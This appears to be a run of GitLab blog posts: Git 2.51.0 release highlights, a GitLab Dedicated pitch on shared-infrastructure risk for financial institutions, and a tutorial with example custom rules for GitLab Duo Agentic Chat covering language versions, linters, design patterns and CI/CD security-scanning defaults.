Since its inception, Git has used the SHA-1 hashing algorithm. However, security researchers have discovered some flaws in SHA-1, specifically the SHAttered attack, which shows a practical SHA-1 hash collision. We moved to using a hardened SHA-1 implementation by default since Git 2.13.0. However, SHA-1 is still a weak hashing algorithm and it is only a matter of time before additional attacks will further reduce its security.

SHA-256 was identified as the successor to SHA-1 in late 2018. Git 2.51.0 marks it as the default hash algorithm to be used in Git 3.0.

This project was led by brian m. carlson.

Removal of git-whatchanged(1)

The git-whatchanged(1) command shows logs with differences each commit introduces. While this is now succeeded by git log --raw, the command was kept around for historical reasons.

Git 2.51.0 requires users of the command to explicitly use the --i-still-use-this flag to capture any users who still use the deprecated command, and also marks the command for removal in Git 3.0.

This project was led by Junio C Hamano.

git switch and git restore are no longer experimental

The git-checkout(1) command can be used for multiple different use cases. It can be used for switching references:

$ git status
On branch master
Your branch is up to date with 'origin/master'.

nothing to commit, working tree clean

$ git checkout next
Switched to branch 'next'
Your branch is up to date with 'origin/next'.

Or for restoring files:

$ echo "additional line" >> git.c

$ git status
On branch master
Your branch is up to date with 'origin/master’.

Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
    modified:   git.c

no changes added to commit (use "git add" and/or "git commit -a")

$ git checkout git.c
Updated 1 path from the index

$ git status
On branch master
Your branch is up to date with 'origin/master’.

nothing to commit, working tree clean

For new users of Git, this can cause a lot of confusion. So in Git 2.33.0, these were split into two new commands, git-switch(1) and git-restore(1).

The git-switch(1) command allows users to switch to a specific branch:

$ git status
On branch master
Your branch is up to date with 'origin/master'.

nothing to commit, working tree clean

$ git switch next
Switched to branch 'next'
Your branch is up to date with 'origin/next'.

And the git-restore(1) command allows users to restore working tree files:

$ echo "additional line" >> git.c

$ git status
On branch master
Your branch is up to date with 'origin/master’.

Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
    modified:   git.c

no changes added to commit (use "git add" and/or "git commit -a")

$ git restore git.c

$ git status
On branch master
Your branch is up to date with 'origin/master’.

nothing to commit, working tree clean

While the two commands have existed since 2019, they were marked as experimental. The effect is that the Git project doesn’t guarantee backwards compatibility for those commands: the behavior may change at any point in time. While the intent originally was to stabilize those commands after a couple of releases, this hasn’t happened up to this point.

This has led to several discussions on the Git mailing list where users are unsure whether they can start using these new commands, or whether they might eventually go away again. But given that no significant changes have ever been proposed, and that some users are already using these commands, we have decided to no longer declare them as experimental in Git 2.51.

This project was led by Justin Tobler.

git for-each-ref(1) receives pagination support

The git for-each-ref command is used to list all references present in the repository. As it is part of the plumbing layer of Git, this command is frequently used for example by hosting forges to list references that exist in the repository in their UI. But as repositories grow, it becomes less realistic to list all references at once – after all, the largest repositories may contain millions of them! So instead, forges tend to paginate the references.

This surfaces an important gap: git-for-each-ref does not know to skip references from previous pages that have already been shown. Consequently, it may have to list a large number of uninteresting references before it finally starts to yield the references required for the current page. This is inefficient and leads to higher-than-necessary latency or even timeouts.

Git 2.51.0 supports a new --start-after flag for git for-each-ref, which allows paginating the output. This can also be combined with the --count flag to iterate over a batch of references.

$ git for-each-ref --count=10
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-001
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-002
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-003
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-004
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-005
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-006
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-007
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-008
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-009
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-010

$ git for-each-ref --count=10 --start-after=refs/heads/branch-010
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-011
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-012
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-013
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-014
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-015
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-016
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-017
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-018
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-019
9751243fba48b34d29aabfc9784803617a806e81 commit    refs/heads/branch-020

This project was led by Karthik Nayak.

What's next?

Ready to experience these improvements? Update to Git 2.51.0 and start using git switch and git restore in your daily workflow.

For GitLab users, these performance enhancements will automatically improve your development experience once your Git version is updated.

Learn more in the official Git 2.51.0 release notes and explore our complete archive of Git development coverage.

The software powering today's financial institutions is anything but ordinary. It includes credit risk models that protect billions in assets, payment processing algorithms handling millions of transactions, customer intelligence platforms that drive business strategy, and regulatory systems ensuring operational compliance — all powered by source code that serves as both operational core and strategic asset.

When shared infrastructure becomes systemic risk

The rise of software-as-a-service platforms has created an uncomfortable reality for financial institutions. Every shared tenant becomes an unmanaged third-party risk, turning platform-wide incidents into industry-wide disruptions. This is the exact kind of concentration risk drawing increasing attention from regulators.

JPMorgan Chase's Chief Information Security Officer Patrick Opet recently issued a stark warning to the industry in an open letter to third-party suppliers. He highlighted how SaaS adoption "is creating a substantial vulnerability that is weakening the global economic system" by embedding "concentration risk into global critical infrastructure." The letter emphasizes that "an attack on one major SaaS or PaaS provider can immediately ripple through its customers,” creating exactly the systemic risk that multi-tenant cloud platforms for source code management, CI builds, CD deployments, and security scanning introduce.

Consider the regulatory complexity this creates. In shared environments, your compliance posture becomes hostage to potential incidents impacting other tenants as well as the concentration risks of large attack surface providers. A misconfiguration affecting any organization on the platform can trigger wider impact across the entire ecosystem.

Data sovereignty challenges compound this risk. Shared platforms distribute workloads across multiple regions and jurisdictions, often without granular control over where your source code executes. For institutions operating under strict regulatory requirements, this geographic distribution can create compliance gaps that are difficult to remediate.

Then there's the amplification effect. Every shared tenant effectively becomes an indirect third-party risk to your operations. Their vulnerabilities increase your attack surface. Their incidents can impact your availability. Their compromises can affect your environment.

Purpose-built for what matters most

GitLab recognizes that your source code deserves the same security posture as your most sensitive customer data. Rather than forcing you to choose between cloud-scale efficiency and enterprise-grade security, GitLab delivers both through GitLab Dedicated, purpose-built infrastructure that maintains complete isolation.

Your development workflows, source code repositories, and CI/CD pipelines run in an environment exclusively dedicated to your organization. The hosted runners for GitLab Dedicated exemplify this approach. These runners connect securely to your data center through outbound private links, allowing access to your private services without exposing any traffic to the public internet. The auto-scaling architecture provides the performance you need, without compromising security or control.

Rethinking control

For financial institutions, minimizing shared risk is only part of the equation — true resilience requires precise control over how systems operate, scale, and comply with regulatory frameworks. GitLab Dedicated enables comprehensive data sovereignty through multiple layers of customer control. You maintain complete authority over encryption keys through bring-your-own-key (BYOK) capabilities, ensuring that sensitive source code and configuration data remains accessible only to your organization. Even GitLab cannot access your encrypted data without your keys.

Data residency becomes a choice rather than a constraint. You select your preferred AWS region to meet regulatory requirements and organizational data governance policies, maintaining full control over where your sensitive source code and intellectual property are stored.

This control extends to compliance frameworks that financial institutions require. The platform provides comprehensive audit trails and logging capabilities that support compliance efforts for financial services regulations like Sarbanes-Oxley and GLBA Safeguards Rule.

When compliance questions arise, you work directly with GitLab's dedicated support team — experienced professionals who understand the regulatory challenges that organizations in highly regulated industries face.

Operational excellence without operational overhead

GitLab Dedicated maintains high availability with built-in disaster recovery, ensuring your development operations remain resilient even during infrastructure failures. The dedicated resources scale with your organization's needs without the performance variability that shared environments introduce.

The zero-maintenance approach to CI/CD infrastructure eliminates a significant operational burden. Your teams focus on development while GitLab manages the underlying infrastructure, auto-scaling, and maintenance — including rapid security patching to protect your critical intellectual property from emerging threats. This operational efficiency doesn't come at the cost of security: the dedicated infrastructure provides enterprise-grade controls while delivering cloud-scale performance.

The competitive reality

While some institutions debate infrastructure strategies, industry leaders are taking decisive action. NatWest Group, one of the UK's largest financial institutions, chose GitLab Dedicated to transform their engineering capabilities:

"NatWest Group is adopting GitLab Dedicated to enable our engineers to use a common cloud engineering platform; delivering new customer outcomes rapidly, frequently and securely with high quality, automated testing, on demand infrastructure and straight-through deployment. This will significantly enhance collaboration, improve developer productivity and unleash creativity via a 'single-pane-of-glass' for software development."

Adam Leggett, Platform Lead - Engineering Platforms, NatWest

The strategic choice

The most successful financial institutions face a unique challenge: They have the most to lose from shared infrastructure risks, but also the resources to architect better solutions.

The question that separates industry leaders from followers: Will you accept shared infrastructure risks as the price of digital transformation, or will you invest in infrastructure that treats your source code with the strategic importance it deserves?

Your trading algorithms aren't shared. Your risk models aren't shared. Your customer data isn't shared.

Why is your development platform shared?

Ready to treat your source code like the strategic asset it is? Let’s chat about how GitLab Dedicated provides the security, compliance, and performance that financial institutions demand — without the compromises of shared infrastructure.

We'll cover:

• Version control: Lock AI to Java 8, handle Python3 environments, and generate multi-platform C++ code
• Style enforcement: Prevent C goto anti-patterns, enforce VueJS design patterns, and ensure Ansible linter compliance
• DevSecOps automation: Bootstrap projects with proper CI/CD security scanning and documentation standards

Each example includes working GitLab projects to fork, complete configurations, and before/after demonstrations. Learn how banking systems stay Java 8 compliant, IoT collectors work cross-platform, and VueJS components follow GitLab's production standards.

Table of Contents

• First steps with custom rules for Duo Agentic Chat
  • Requirements
  • Quick start: 5-minute success
  • Guidelines for custom rule development
  • Ask GitLab Duo Chat about existing development style guides
• More custom rules use cases
  • Use cases: Version and platform support
    • Java version requirements
    • C++ Multi-platform support (Windows, Linux, macOS)
  • Use case: Development environments
    • Python 3 development environment
    • Ansible linter compliance
  • Use case: Design patterns
    • Avoid anti-patterns with C and goto statements
    • Frontend style guides for VueJS 3
  • Use case: DevSecOps workflows
    • Issue and MR templates
    • Build tools
    • CI/CD configuration preferences
    • Security scanning preferences
    • Tests and linters
    • Documentation generation
    • Refactoring and code change requirements
    • Onboarding, requirements, licenses
    • Git flows
• Distribution and testing of custom rules
  • Custom Rules resources
• Fun activity: Explore behavior changes
• Conclusion

First steps with custom rules for Duo Agentic Chat

Follow the documentation to create custom rules for GitLab Duo Agentic Chat in the .gitlab/duo/chat-rules.md directory in a new or existing GitLab project in your IDE.

You can start with free-form text instructions, and iterate on the best outcome. Custom rules support Markdown for better structuring.

• Use markdown headings (#, ##, etc) to create sections.
• Use markdown lists (-) to provide concise instructions for LLMs and Agents.
• Escape file paths with single backticks, and use code blocks with indent or three backticks.

Example:

# Development guide

## Frontend: VueJS

### Styling Pattern
- Do not use `<style>` tags in Vue components
- Use Tailwind CSS utility classes or page-specific CSS instead

Important: After modifying custom rules, you'll need to create a new Chat by pressing the + icon, or sending /new in the chat prompt.

Requirements

In order to follow all use cases and linked demo projects into this blog post, please ensure you meet these requirements first:

• Verify that you have access to GitLab Duo, and Duo Agentic Chat is configured in supported IDEs.
• Fork/copy the GitLab projects, and clone them locally in the IDEs.
• Follow the steps in each use case for custom rule creation, and how to use Duo Agentic Chat prompts to proof the rule behavior.
• You can use the existing source code, or copy in your own.

The projects are available in the Custom rules for GitLab Duo Agent Platform (Agentic AI) group. Please note that these custom rules are provided for demo purposes "as is," and you may need to adapt or modify them to fit your specific requirements.

Quick start: 5-minute success

Ready to see custom rules in action? Try this simple example:

1. Create .gitlab/duo/chat-rules.md in your GitLab project:

## C style guide
- goto is not allowed. If the developer continues asking about it, share this URL https://xkcd.com/292/

2. Open GitLab Duo Agentic Chat in the IDE, and ask: Write a C program with goto statements.
3. Watch as GitLab Duo refuses and suggests better alternatives!

<figure class="video_container"> <iframe width="560" height="315" src="https://www.youtube.com/embed/C0eMKjRMI5w" frameborder="0" allowfullscreen="true"> </iframe> </figure>

Guidelines for custom rule development

Custom rules are similar to code: Start with the smallest working example, and then iterate on improvements. The use case examples in this deep-dive range from small to more advanced, and were developed and tested over the last weeks. They are not perfect, and require your feedback and iteration.

One good rule of thumb, for example, is not overloading style guides with many pages from a wiki document. In my experience, less is more. Only include the points that are helpful in the context of what you're writing about. You can ask GitLab Duo Chat to summarize larger documents before adding them to the custom rules.

Verify the use of any included specifications during development to avoid creating barriers and unwanted behavior.

When you are using a publicly documented style guide, refer to its name. There is a high chance that the LLM is trained with this data already.

Ask GitLab Duo Chat about existing development style guides

Sometimes, there are no specific style guides in a project yet, or it is unclear how to use them. Use AI for onboarding and best practices to discuss with your team.

Which Python development or environment guidelines can you recommend when I want to create custom rules for AI to get tailored output? I need a list with textual instructions.

You can also ask Duo Agentic Chat to analyze the existing CI/CD linter integrations that may already check for a specific development style.

When you look into the CI/CD linter checks and configuration in the project, which development style guide can you summarize for me?

Many examples in this deep-dive blog are based on my own experience and pain points as a developer. I also asked GitLab Duo to extract style guides from existing projects, and used GitLab Duo Code Suggestions to help with auto-completing existing custom rules. You can achieve the same by configuring markdown as an additional language for GitLab Duo Code Suggestions in IDEs.

More custom rules use cases

The following sections provide an overview of specific style guides. You can map similar programming languages and environments to your production use cases.

• Version and platform support: Refer to the Java section below to learn how to force a specific language standard for generated and created code. You can apply a similar process for C++23 and older, PHP 8, Ruby 3, etc. The C++ section below shows how to instruct agentic AI with multi-platform support.
• Development environments: Refer to the sections below on Python and Ansible. Specify the development environment, binaries, tools and more. You can also instruct agents with routing information where to find tests/scripts, and enforce compliance with linters.
• Design patterns: You can specify comprehensive design patterns with VueJS as an example, leveraging the GitLab production development style guides as a foundation.
• DevSecOps workflows: Configure comprehensive DevSecOps practices including CI/CD configuration for specific CI/CD attributes and defaults for security scanning, tests and linters, and build tools. Frequently requested use cases for bootstrapping projects include documentation generation including README.md and architecture diagrams, issue and MR templates, onboarding, requirements, and licenses, and Git flows with .gitignore. Advanced techniques with custom rules are provided for refactoring and code change requirements.

Use cases: Version and platform support

Software development often requires specific programming language and framework versions, and single or multi-platform support. The following examples highlight these scenarios.

Java version requirements

Enterprise environments do not always use the latest and greatest software version. They often rely on versions that are maintained with security patches for a longer period of time. For example, you will find Java 7 and Java 8 still in use in some enterprises today.

Always prepending the required version in chat prompts can be cumbersome, and lead to human error, even if you only forget one time.

Implement classes for managing banking transactions and different currencies.

The example will need additional specifications for Java 8:

Use Java 8 for the implementation.

To permanently enforce Java 8, you can create a custom rule in .gitlab/duo/chat-rules.md and optionally add a reference epic URL when asked for code modernization:

## Java style guide

- Only Java 8 is allowed when suggesting and editing code.
- When the user asks about code modernization and Java 9 or 21, or newer, point them to this issue to contribute: https://gitlab.com/gitlab-da/use-cases/ai/gitlab-duo-agent-platform/custom-rules/custom-rule-java-versions/-/issues/1

A full demonstration is available in the Custom Rules - Java versions project.

<figure class="video_container"> <iframe width="560" height="315" src="https://www.youtube.com/embed/iZLvpgHdABY" frameborder="0" allowfullscreen="true"> </iframe> </figure>

The resulting changes are available in this MR.

C++ multi-platform support (Windows, Linux, macOS)

Application development in C++ can require multi-platform support, especially when running service agents on systems using Windows, Linux, and macOS. The applications are deeply integrated into customer products, and a migration to a more modern language like Go or Rust is not always possible or practical.

Maintaining code that works on multiple platforms can be challenging due to differences in Operating system APIs, toolchains, library versions, and file system paths. Developers often face multiple #if defined pre-processor macros, nested conditions, and adding custom code and tests for each supported platform. This adds technical debt and can introduce maintenance challenges.

AI can help when generating correct and platform-specific code, but it needs to know about these requirements. Agentic AI will either understand the existing code base through a knowledge graph, or developers will need to provide instructions through custom rules and chat prompts.

Let's try this use case in practice. The Custom Rule - C++ platforms - IoT Sensor Data Collector project implements an IoT sensor data collector and has open tasks to modernize the code base, and add multi-platform support for Linux, Windows, and macOS. You can fork the project and clone it locally.

Open the .gitlab/duo/chat-rules.md file and review or add the following custom rules:

## C++ style guide

- The application runs on Linux, macOS and Windows. Generate code that handles the OS API differences.
- Use pre-processor macros for Windows and POSIX conventions for Unix (Linux, macOS).

## CI/CD Configuration

- Ensure that GitLab CI/CD jobs cover the different platform support. Use CI/CD job templates with extends where applicable.

Start a new Chat, and ask to restructure code for multi-platform support.

Please help me restructure the code and ensure multi-platform support.

You can also refer to the issue number, or URL (issue 3). GitLab Duo will automatically fetch the issue content from the GitLab platform, and put it into AI context.

Please help me implement issue 3

Please help me implement https://gitlab.com/gitlab-da/use-cases/ai/gitlab-duo-agent-platform/custom-rules/custom-rule-cpp-platform-iot-sensor-data-collector/-/issues/3

<figure class="video_container"> <iframe width="560" height="315" src="https://www.youtube.com/embed/C5NxOjB0R1Q" frameborder="0" allowfullscreen="true"> </iframe> </figure>

Use case: Development environments

Development environments often vary between operating systems and developers. This can be confusing for AI models generating code or suggesting changes. The following use cases illustrate these environment problems and their solutions with custom rules.

Python 3 development environment

A Python development environment usually comes with the python executable and pip package manager. However, on systems like MacOS or Ubuntu, you need to use python3 and pip3 to get access to more recent Python 3 versions. This can create confusion running Python scripts, creating virtual environments, and installing package dependencies.

For this custom rules use case, I installed Python using Homebrew which results in a binary executable called python3 and a package manager pip3.

As an example, set up a Python virtual environment, install dependencies using pip, and run the application:

python -m venv myenv
source myenv/bin/activate

pip install -r requirements.txt

python script.py

This doesn't work as expected because we need to use specific binaries with version 3:

python3 -m venv myenv
source myenv/bin/activate

pip3 install -r requirements.txt

python3 script.py

We can test this problem with Agentic Chat for both, suggested code blocks, and the approval request for commands to execute. The Custom Rule - Python3 Env Shop app project implements a web shop application in Python, and provides the default Python executable paths in its README.md file which typically gets added into Agentic Chat context.

In order to overcome the problem, review .gitlab/duo/chat-rules.md which contains the following custom rules to enforce the Python executable names.

## Python style guide

- For Python binaries, always use python3 and pip3 when suggesting or running shell commands.
- Detect the Python environment automatically when possible.

You can also instruct agents with pre-defined routes to gather additional information through tool calling and/or MCP, when they do not attempt this automatically already.

Open a new Agentic Chat, and ask How to run this application? to see custom rules in action, using python3 and pip3 as desired.

<figure class="video_container"> <iframe width="560" height="315" src="https://www.youtube.com/embed/UQ2_OCvUmF0" frameborder="0" allowfullscreen="true"> </iframe> </figure>

The full source code is available in the Custom Rule - Python3 Env Shop app project.

Ansible linter compliance

Modern Ansible for Infrastructure-as-Code tasks enforces a strict style guide, which can be verified using ansible-lint: It detects when Boolean values (true/false) are required instead of strings (yes/no), builtin module actions requiring the FQCN (Fully Qualified Collection Name) as parameter names, and trailing whitespaces that need trimming. CLI and IDE integrations, such as the VS Code Ansible extension by Red Hat help visualize these errors to developers. LLMs and chat agents might not always generate correct Ansible code and need manual work to fix it.

Let's look at the problem with a concrete use case. The following example implements a basic Ansible playbook in the Custom Rule - Ansible Environment project to set up a GitLab server on Ubuntu. You'll notice the Boolean values are incorrectly typed as strings (yes/no), and additional problem reports for builtin module actions and whitespace trimming.

Let's see how we can create custom rules to help Duo Agents fix the Ansible linter errors, and prevent them from happening in the future.

Fork and clone the Custom Rule - Ansible Environment project and open .gitlab/duo/chat-rules.md in the IDE inspect the custom rules:

## Ansible styleguide

- Boolean values in Ansible should be typed as "true" or "false" and never as string.
- Ansible module builtin actions must use the FQCN (Fully Qualified Collection Name).
- Always trim whitespaces in Ansible YAML.

Open a new GitLab Duo Agentic Chat prompt, and ask Duo Agent for the same Ansible playbook:

Please help me fix the Ansible linter errors

The Agents will analyze the repository, ask to run ansible-lint commands, and investigate how to fix the problems followed the defined custom rules.

<figure class="video_container"> <iframe width="560" height="315" src="https://www.youtube.com/embed/P465U8IfScE" frameborder="0" allowfullscreen="true"> </iframe> </figure>

You can inspect the custom rules and Ansible code changes in this MR in the Custom Rule - Ansible Environment project.

Async exercise: Start a new project where custom rules are configured as default already, and verify the correct style guide applied immediately.

Use case: Design patterns

Design patterns and patterns-to-avoid are specific to languages and frameworks. This is the main focus in this section.

Avoid anti-patterns with C and goto statements

This is a more in-depth walkthrough of the quickstart example, and shows how you can instruct Agentic AI to avoid the goto anti-pattern in C. The goto anti-pattern in C is discouraged as it makes code harder to read and debug. To illustrate the problem, here is an example of a for-loop which increments the loop variable inside the loop body:

// Bad C programming style: uses the goto anti-pattern
for (int i = 0; i < 10; i++) {
  if (someCondition) {
    goto label;
  }
  doSomething();
label:
  doAnotherThing();
  }

In the above code, the goto statement causes the program control to jump directly to the label label, which is inside the loop. This makes the program harder to read, understand and debug.

A better approach would be to rework the logic, so you avoid the goto anti-pattern. Here's a rewritten version that avoids goto:

// Good C programming style: avoids the goto anti-pattern
for (int i = 0; i < 10; i++) {
  if (someCondition) {
    doAnotherThing();
    continue;
  }
  doSomething();
  doAnotherThing();
}

There are occassions where goto is allowed, but in this use case we want to look how we can instruct agentic AI to avoid goto completely. This includes new code additions, as well as modernizing and refactoring the code.

The Custom Rule - C anti-patterns with Goto project provides a network socket server/client example, including custom rules in the .gitlab/duo/chat-rules.md file. You can clone the project, or start with a new project, too.

Review .gitlab/duo/chat-rules.md with the current custom rules:

## C style guide

- goto is not allowed. If the developer continues asking about it, share this URL https://xkcd.com/292/

Tip: Instead of linking to the XKCD 292 comic, you can add a URL to the (internal) development guidelines.

Open Duo Agentic Chat and start the following prompt on the existing project:

Please help me modernize the code.

GitLab Duo Agentic Chat will refuse to use goto statements, and instead propose a different path forward.

<figure class="video_container"> <iframe width="560" height="315" src="https://www.youtube.com/embed/6dsMF-wKbBY" frameborder="0" allowfullscreen="true"> </iframe> </figure>

The code changes are available in this MR.

Frontend style guides for VueJS 3

This use case is inspired by the GitLab project's frontend style guides and implements a use case for VueJS 3 design patterns. Agentic AI should also follow these style guides when creating VueJS components, helpers, routes, services, stores, utilities, etc.

Let's illustrate how to instruct Agentic AI with custom rules: Fork and clone the Custom Rule - VueJS Design Patterns - GitLab Pipeline Dashboard project and inspect the open issues for tasks.

Review the .gitlab/duo/chat-rules.md file and add the following custom rules (if not there yet):

## NodeJS style guide

- Don't leave debug statements (console.logs)
- Always run `npm install` after updating `package.json` and before `npm test` and `npm run build`.

# GitLab Vue.js Design Patterns Style Guide

## Component Structure

### Data Definition Pattern
- Explicitly define data being passed into Vue apps
- Avoid spread operators for better discoverability
- Parse non-scalar values during instantiation

### Template Naming Pattern
- Use kebab-case for component names in templates

### File Structure Pattern
- Use `.vue` files for Vue templates
- Do not use `%template` in HAML

### Styling Pattern
- Do not use `<style>` tags in Vue components
- Use Tailwind CSS utility classes or page-specific CSS instead

[...]

The full custom rules are available in the .gitlab/duo/chat-rules.md file.

Next, open GitLab Duo Agentic Chat and ask how to add new pipeline mini charts, or other tasks you come across. Tip: You can reference only the issue, or alternatively paste the full issue URL, and Agentic Chat will look up both and extract the title and description for the current context.

Please help me implement issue 6

<figure class="video_container"> <iframe width="560" height="315" src="https://www.youtube.com/embed/KbczS-OVb90" frameborder="0" allowfullscreen="true"> </iframe> </figure>

The resulting code changes are available in this MR.

Note: The VueJS style guide was extracted from the gitlab-org/gitlab project asking GitLab Duo Agentic Chat with the following prompt sequence:

What is the development style guide for VueJS?

Can you print the styleguide as Markdown formatted list with headings.

Create a file in the repo, and only print the style guide rules there, no codeblocks.

Use case: DevSecOps workflows

DevSecOps workflows range from best practices for bootstrapping a project with issue/MR templates, .gitignore, GitLab CI/CD configuration, README.md documentation, licenses and much more. The following section explores a variety of use cases. You can use them as inspiration for your own custom rules.

Common DevSecOps automation with custom rules:

• Project bootstrap: Auto-create README, .gitignore, CI/CD config
• Security defaults: Enforce SAST, dependency scanning, secrets detection
• Documentation: Generate issue/MR templates, architecture diagrams

A combined use case example is available in the Custom Rule - DevSecOps workflows - Git README build tools issue MR templates project. You can inspect the custom rules, and fork/clone it locally to ask Agentic Chat with a new prompt such as: I need to bootstrap this project. Please help me with that.

<figure class="video_container"> <iframe width="560" height="315" src="https://www.youtube.com/embed/hKpLcBtbC4g" frameborder="0" allowfullscreen="true"> </iframe> </figure>

The next sections provide detailed prompts, and most of them are shown in the recording, too.

Issue and MR templates

You can instruct agentic AI to create issue/MR templates when they are missing, and offer to add project-specific information or labels. Agents will automatically query the GitLab API in the background, and put the current project structure into a template.

## Issue and MR templates

- If no issue templates for `Default` and `Feature Proposal` exist in .gitlab/issue_templates, create them using the following raw template sources:

        Default: https://gitlab.com/gitlab-org/gitlab-vscode-extension/-/raw/main/.gitlab/issue_templates/Default.md
        Feature Proposal: https://gitlab.com/gitlab-org/gitlab-vscode-extension/-/raw/main/.gitlab/issue_templates/Feature%20Proposal.md

- If no default MR template `Default` exists in `.gitlab/merge_request_templates`, create them using the following raw template sources:

        Default: https://gitlab.com/gitlab-org/gitlab-vscode-extension/-/raw/main/.gitlab/merge_request_templates/Default.md

- Update the project URLs, and available labels in the fetched templates accordingly, or remove anything unknown and let the user know about TODOs.
- Create a test issue/MR, when bootstrapping a new project.

Build tools

There is a variety of build tools, package managers, compilers, container builders available per programming language. When asking about updates and dependencies, agentic AI can use these default tools without asking for input.

## Build tools

- Always use a virtual env with Python, and set it up before executing any Python commands
- For C/C++: Prefer CMake, and gcc on Linux, clang on macOS, MSVC on Windows.
- For Python: Always use pip
- For Java: Always use Gradle
- For Node.js, suggest to use npm/yarn.
- For Rust: Always use cargo
- For Go: Always use go.mod
- For Ruby: Always use Bundler
- For PHP: Always use Composer
- For .NET: Always use .NET CLI
- For Scala: Always use SBT
- For Elixir: Always use Mix
- For Haskell: Always use Cabal
- For Swift: Always use Swift Package Manager
- For Kotlin: Always use Gradle or Maven.
- For TypeScript: Always use npm or yarn.
- Always suggest using a package manager or build tool based on the main programming language of the project.
- When asking for dependencies, assume that the user wants to update all current dependencies to the latest version available.

- Always suggest to create a Dockerfile if there isn't one. Always use a minimal image and use a tag for security scanning.
- Always add a `Dockerfile` with the base image and the entrypoint if one does not exist.
- Always include a `.dockerignore` and use it in the Docker build process.

CI/CD configuration preferences

Use rules to prefer specific container images, variable and job name patterns, etc.

## CI/CD Configuration

- If no GitLab CI/CD configuration exists in `.gitlab-ci.yml`, ask the user for approval to create.
- Create a GitLab CI/CD configuration automatically when a new project gets bootstrapped

- Always use alpine as container image to build the application.
- Add caching for detected programming languages and frameworks.

Security scanning preferences

Security scanners can also be enforced in GitLab CI/CD configuration. The following example instructs agents to always include Advanced SAST, dependency scanning, and secret detection templates. It has been successfully tested across other use cases in this tutorial.

## Security scanning

- Always use Advanced SAST.
- Always include SAST, Dependency Scanning, Secrets Detection templates, similar to the following format:

    include:
        - template: Jobs/SAST.gitlab-ci.yml
        - template: Jobs/Secret-Detection.gitlab-ci.yml
        - template: Jobs/Dependency-Scanning.gitlab-ci.yml

    variables:
        GITLAB_ADVANCED_SAST_ENABLED: 'true'

Tests and linters

You can also directly instruct Agentic Chat where to find the tests, and how to run them. The same idea applies to calling linter commands. Thanks Jessie Young for sharing this neat tip!

## Tests and linting details

- Tests in this project are located in __ directory and are run using the ___ command
- Linting is done with the ___ command

Documentation generation

Best of documentation custom rules.

- If a README is missing, ask the user if they want to create one. If the user agrees, create a basic `README.md` for them.
- When the user asks for an architecture proposal, always respond with generating an architecture diagram in Mermaid, and ask the user if they want you to add it to the README.md or another documentation file.
- For documentation in Markdown, always use GitLab flavored Markdown.
- Always add correct code block syntax highlighting support.

Refactoring and code change requirements

When a project should gradually be modernized with newly generated code, and not result in large refactors, the following rules can be helpful.

## Keep the changes minimal

- The project uses <this standard and version>. For newly generated code, use this standard.
- Do not attempt to refactor code already created in a project to this standard, but for new code, always ensure this standard is used.
- If unsure whether a file requires modification or refactoring, document this as a todo task.
- Never fix detected problems, whitespaces, code formatting, unless the user instructs you specifically in a comment.
- The code must be retained in its original format and only changes specific to solving the user request are allowed.

## Summaries

- List all items to address at the bottom in a summary section with TODO: followed by a textual description.
- Identify 3 critical items, and ask the user if you should create GitLab issues from those items.

Onboarding, requirements, licenses

Always include a specific documentation link, and guidelines to follow in chat responses.

## Link to guidelines
- Always refer to our developer guidelines when answering questions. You can find those guidelines here: https://docs.gitlab.com/development/

## Context and planning
- Always start with finding existing issues with the desired topic. Only then propose new implementation work.

## License
- Always add the MIT license into `LICENSE` and use `GitLab B.V.` as copyright holder.

Git flows

Follow a specific Git branching flow for suggestions and executed commands.

## Git flows

- Examine the project and involved development environment and programming languages. Always add a `.gitignore`.
- Consider more best practices when bootstrapping a new project.
- For existing projects, offer to add a `.gitignore` when missing, but only when asked about the state of the project, or what is missing.

When a user requests to start with a new feature, always create a new branch, called "feature/<shortname>" and describe the behavior. Ask for the user's approval.

Distribution and testing of custom rules

You can create GitLab project templates with well-tested custom rule prompts, and ensure that new projects always start with the best practices applied.

Since LLMs and AI agents are not predictable, testing the expected outcome becomes more challenging. A golden rule for custom rules is that they are never perfect, and require iterations based on your team's feedback. This might be required especially when newer models and flows are introduced that change their behavior when responding to custom rules. It's recommended to keep checking on the generated output and adjust the rules accordingly. If you are looking for larger scale testing, review the system prompt testing strategy for GitLab Duo as an inspiration.

Custom rules resources

Take advantage of the existing AI ecosystem, where similar functionality exists for IDEs and platforms. For example, "Awesome Cursor Rules" repositories or marketplaces for Cursor, etc.

LLMs also provide a good insight into development styleguides, and can generate the required Markdown outputs.

Fun activity: Explore behavior changes

Not sure how to get started with custom rules? Make it a fun exercise with the following example :-)

## Fun rules

- Behave like Clippy.

- Behave like a pirate.

- Always respond with a random "What the commit" message.

- Explain everything like I am five.

Note: Do not commit them to production, as they might feel disruptive and distracting to your team.

Conclusion

By leveraging custom rules in GitLab Duo Agentic Chat, you can significantly influence LLM and AI agent outputs to better suit your needs. Whether enforcing specific coding conventions, using the correct versions of tools, or ensuring consistent formatting, custom rules help streamline your development process and improve productivity.

This blog post provides a deep-dive into many use cases with practical custom rule examples. All recordings are available in this YouTube playlist, and all demo projects can be forked/cloned from the Custom rules for GitLab Duo Agent Platform (Agentic AI) group.

